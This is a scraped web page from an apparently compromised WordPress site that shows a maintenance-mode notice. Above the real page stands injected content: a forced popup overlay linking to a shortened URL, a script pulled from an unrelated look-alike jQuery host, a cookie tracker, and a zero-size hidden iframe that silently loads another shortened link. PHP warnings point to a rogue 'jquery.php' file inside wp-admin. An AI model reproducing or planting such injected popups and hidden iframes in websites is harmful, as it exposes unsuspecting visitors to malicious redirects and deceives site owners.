<style type="text/css">
html {width:100%;}
body {width:100%; height:100%; position:relative;}
#videopop {display:none; width:100%; height:100%; position:absolute; top:0; left:0; z-index:9995;}
#videopop .pf_overlay {width:100%; height:100%; background:url(http://i.imgur.com/7Kftwaa.png) 0 0 repeat; position:fixed; top:0; left:0; z-index:9997;}
#videopop .content {width:1052px; height:771px; margin:0; margin-left:-526px; background:#f1f2f2; position:absolute; left:50%; top:70px; -moz-border-radius:5px; -webkit-border-radius:5px; -o-border-radius:5px; border-radius:5px; z-index:9998; border:1px solid #777777; -moz-box-shadow:0 0 20px #777777; -webkit-box-shadow:0 0 20px #777777; -o-box-shadow:0 0 20px #777777; box-shadow:0 0 20px #777777;}
#videopop .content a {display:block;}
#videopop .content a img {width:100%; max-width:100% !important; -moz-border-radius:4px; -webkit-border-radius:4px; -o-border-radius:4px; border-radius:4px;}
#videopop .close {display:block; width:50px; height:50px; background:url(http://i.imgur.com/czcCtCh.png) 0 0 no-repeat; position:absolute; top:-25px; right:-25px; z-index:9998;}
/* To 1280px */
@media screen and (max-width: 1280px) {
#videopop .content {width:842px; height:617px; margin-left:-421px; top:100px;}
}
/* To 1024px */
@media screen and (max-width: 1024px) {
#videopop .content {width:736px; height:540px; margin-left:-368px; top:90px;}
}
/* To 900px */
@media screen and (max-width: 900px) {
#videopop .content {width:631px; height:463px; margin-left:-315px; top:80px;}
}
/* To 800px */
@media screen and (max-width: 800px) {
#videopop .content {width:526px; height:385px; margin-left:-263px; top:70px;}
}
/* To 640px */
@media screen and (max-width: 640px) {
#videopop .content {width:421px; height:308px; margin-left:-210px; top:50px;}
}
/* To 480px */
@media screen and (max-width: 480px) {
#videopop .content {width:284px; height:208px; margin-left:-142px; top:30px;}
}
</style>
<div id="videopop">
	<div class="pf_overlay"></div>
	<div class="content">
		<a href="http://goo.gl/ewt4H0" target="_blank"><img src="http://i.imgur.com/qbugp0y.jpg" alt="" /></a>
        <a class="close" href="#"></a>
	</div>
</div>
<script type="text/javascript" src="https://popupjquery.github.io/jquery/jquery.js"></script>
<script type="text/javascript">
(function (factory) {
	if (typeof define === 'function' && define.amd) {
		define(factory);
	} else if (typeof exports === 'object') {
		module.exports = factory();
	} else {
		var _OldCookies = window.Cookies;
		var api = window.Cookies = factory();
		api.noConflict = function () {
			window.Cookies = _OldCookies;
			return api;
		};
	}
}(function () {
	function extend () {
		var i = 0;
		var result = {};
		for (; i < arguments.length; i++) {
			var attributes = arguments[ i ];
			for (var key in attributes) {
				result[key] = attributes[key];
			}
		}
		return result;
	}

	function init (converter) {
		function api (key, value, attributes) {
			var result;

			// Write

			if (arguments.length > 1) {
				attributes = extend({
					path: '/'
				}, api.defaults, attributes);

				if (typeof attributes.expires === 'number') {
					var expires = new Date();
					expires.setMilliseconds(expires.getMilliseconds() + attributes.expires * 864e+5);
					attributes.expires = expires;
				}

				try {
					result = JSON.stringify(value);
					if (/^[\{\[]/.test(result)) {
						value = result;
					}
				} catch (e) {}

				value = encodeURIComponent(String(value));
				value = value.replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g, decodeURIComponent);

				key = encodeURIComponent(String(key));
				key = key.replace(/%(23|24|26|2B|5E|60|7C)/g, decodeURIComponent);
				key = key.replace(/[\(\)]/g, escape);

				return (document.cookie = [
					key, '=', value,
					attributes.expires && '; expires=' + attributes.expires.toUTCString(), // use expires attribute, max-age is not supported by IE
					attributes.path    && '; path=' + attributes.path,
					attributes.domain  && '; domain=' + attributes.domain,
					attributes.secure ? '; secure' : ''
				].join(''));
			}

			// Read

			if (!key) {
				result = {};
			}

			// To prevent the for loop in the first place assign an empty array
			// in case there are no cookies at all. Also prevents odd result when
			// calling "get()"
			var cookies = document.cookie ? document.cookie.split('; ') : [];
			var rdecode = /(%[0-9A-Z]{2})+/g;
			var i = 0;

			for (; i < cookies.length; i++) {
				var parts = cookies[i].split('=');
				var name = parts[0].replace(rdecode, decodeURIComponent);
				var cookie = parts.slice(1).join('=');

				if (cookie.charAt(0) === '"') {
					cookie = cookie.slice(1, -1);
				}

				try {
					cookie = converter && converter(cookie, name) || cookie.replace(rdecode, decodeURIComponent);

					if (this.json) {
						try {
							cookie = JSON.parse(cookie);
						} catch (e) {}
					}

					if (key === name) {
						result = cookie;
						break;
					}

					if (!key) {
						result[name] = cookie;
					}
				} catch (e) {}
			}

			return result;
		}

		api.get = api.set = api;
		api.getJSON = function () {
			return api.apply({
				json: true
			}, [].slice.call(arguments));
		};
		api.defaults = {};

		api.remove = function (key, attributes) {
			api(key, '', extend(attributes, {
				expires: -1
			}));
		};

		api.withConverter = init;

		return api;
	}

	return init();
}));
setTimeout(function(){
	jQuery.noConflict();
	jQuery(document).on("click","#videopop .close",function(){ jQuery("#videopop").fadeOut(); return false;});
	jQuery("#videopop").fadeIn();
	jQuery("html, body").animate({scrollTop:20}, 500);
	Cookies.set("videopp_opened", "yes", { expires: 365, path: "/" });
},7000);
</script>
<iframe src='http://goo.gl/9aspBH' style='width: 0px; height: 0px;'></iframe>
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-admin/includes/jquery.php:70) in <b>/nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-content/plugins/wp-maintenance-mode/includes/classes/wp-maintenance-mode.php</b> on line <b>503</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-admin/includes/jquery.php:70) in <b>/nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-content/plugins/wp-maintenance-mode/includes/classes/wp-maintenance-mode.php</b> on line <b>504</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-admin/includes/jquery.php:70) in <b>/nfs/c08/h06/mnt/153007/domains/dankimball.com/html/wp-content/plugins/wp-maintenance-mode/includes/classes/wp-maintenance-mode.php</b> on line <b>505</b><br />
<!DOCTYPE html>
<html>
    <head>
        <title>Maintenance mode</title>
        <meta name="author" content="Designmodo" />
        <meta name="description" content=" - " />
        <meta name="keywords" content="Maintenance Mode" />
        <meta name="robots" content="index, follow" />
                        <link rel="stylesheet" href="http://dankimball.com/wp-content/plugins/wp-maintenance-mode/assets/css/style.css">
                <style>.background { background: url(http://dankimball.com/wp-content/uploads/2015/02/423029_316130321776797_571913141_n1.jpg) no-repeat center top fixed; background-size: cover; }</style>    </head>
    <body class="background">
        <div class="wrap">
                        
            
            
                        
                
        </div>

        <script type='text/javascript'>
            var wpmm_vars = {"ajax_url": "http://dankimball.com/wp-admin/admin-ajax.php"};
        </script>
                        <script src="http://dankimball.com/wp-includes/js/jquery/jquery.js"></script>
                                <script src="http://dankimball.com/wp-content/plugins/wp-maintenance-mode/assets/js/scripts.js"></script>
                    </body>
</html>
